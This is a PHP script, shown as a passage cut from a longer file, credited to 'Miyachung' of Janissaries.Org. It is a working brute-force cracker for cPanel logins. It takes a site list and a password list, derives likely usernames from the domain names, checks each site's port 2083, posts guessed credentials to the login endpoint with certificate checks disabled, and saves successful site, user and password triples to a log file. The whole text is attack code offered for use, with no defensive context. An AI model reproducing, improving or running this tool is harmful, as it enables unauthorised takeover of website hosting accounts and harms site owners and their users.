http://www.youtube.com/watch?v=mLkudfIAPgA *********************************************************************/ class cracker { public $sitelist; public $passlist; public function calis() { $usernames = $this->make_username(); $sitelist = explode("\n",$this->openfile($this->sitelist)); $passlist = explode("\n",$this->openfile($this->passlist)); $increment = 0; echo "\n\n[*]Site list -> $this->sitelist\n"; echo "[*]Pass list -> $this->passlist\n"; echo "[*]Total urls -> ".count($sitelist)."\n"; echo "[*]Total pass -> ".count($passlist)."\n"; echo "[*]Cracking started\n\n"; foreach($sitelist as $id => $site) { $increment++; $site = trim($site); echo "-------------------------------------------------------\n"; echo "[*]Trying site: ".$site." $increment / ".count($sitelist)."\n"; if(eregi('http',$site)){ $site = str_replace("http://","https://",$site); }else{ $site = "https://$site"; } $site= $site.":2083"; if(!$this->pass_site($site)) { echo "[-]Not cpanel,passing site\n"; echo "-------------------------------------------------------\n\n"; continue; } echo "[*]Connected Cpanel [OK]\n"; echo "[*]Username: ".$usernames[$id]."\n"; echo "[*]Loaded ".count($passlist)." passwords\n"; echo "[*]Coded by Miyachung ||| Janissaries.Org\n"; foreach($passlist as $pass) { $cracked = false; $pass=trim($pass); $result = $this->post($site,$usernames[$id],$pass); if(preg_match('/security_token/',$result)) { $cracked = true; echo "[+]$pass password cracked for $usernames[$id]\n"; echo "-------------------------------------------------------\n\n"; $this->savefile("$site|$usernames[$id]|$pass"); break; } } if(!$cracked){echo "[-]Not found\n";echo "-------------------------------------------------------\n\n";} } } private function make_username() { $op = explode("\n",$this->openfile($this->sitelist)); foreach($op as $site) { if(eregi('http://',$site)) $site = str_replace("http://","",$site); if(!eregi('www',$site)) $site = "www.".$site; $site = explode(".",$site); $site = str_replace("-","",$site[1]); $usernames[] = substr($site,0,8); } return $usernames; } public function lists() { echo "[!]Site list: "; $sitelist = fgets(STDIN); $sitelist = str_replace("\r\n","",$sitelist); $sitelist = trim($sitelist); echo "[!]Pass list: "; $passlist = fgets(STDIN); $passlist = str_replace("\r\n","",$passlist); $passlist = trim($passlist); return array($sitelist,$passlist); } private function post($site,$user,$pass) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1"); curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl,CURLOPT_TIMEOUT,7); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass"); $exec = curl_exec($curl); return $exec; } private function pass_site($site) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); curl_setopt($curl,CURLOPT_URL,$site); curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true); curl_setopt($curl,CURLOPT_TIMEOUT,7); $exec = curl_exec($curl); $info = curl_getinfo($curl); if($info['http_code'] != 0) { return true; } else { return false; } } private function openfile($file) { $file = @file_get_contents($file); if(!$file) exit("WTF File not found ?"); return $file; } private function savefile($content) { $file = fopen('crackerlog.txt','ab'); fwrite($file,$content."\r\n"); fclose($file); return $file; } } $class = new cracker(); $lists = $class->lists(); if(empty($lists[0]) || empty($lists[1])) exit("WTF Empty ? "); $class->sitelist = $lists[0]; $class->passlist = $lists[1]; $class->calis(); ?>